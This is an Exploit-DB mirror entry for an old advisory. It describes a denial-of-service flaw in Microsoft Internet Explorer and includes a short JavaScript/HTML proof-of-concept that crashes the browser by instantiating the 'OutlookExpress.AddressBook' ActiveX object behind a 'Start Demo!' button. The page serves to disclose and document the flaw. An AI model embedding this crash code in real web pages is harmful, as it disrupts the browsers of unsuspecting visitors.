exploit-db-mirror/exploits/windows/dos/28144.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

15 lines
No EOL
500 B
Text

source: https://www.securityfocus.com/bid/18771/info
Microsoft Internet Explorer is prone to a denial-of-service condition when processing the 'OutlookExpress.AddressBook' COM object.
A successful attack may cause the browser to fail due to a null-pointer dereference.
// MoBB Demonstration
function Demo() {
var a = new ActiveXObject("OutlookExpress.AddressBook");
}
</script>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>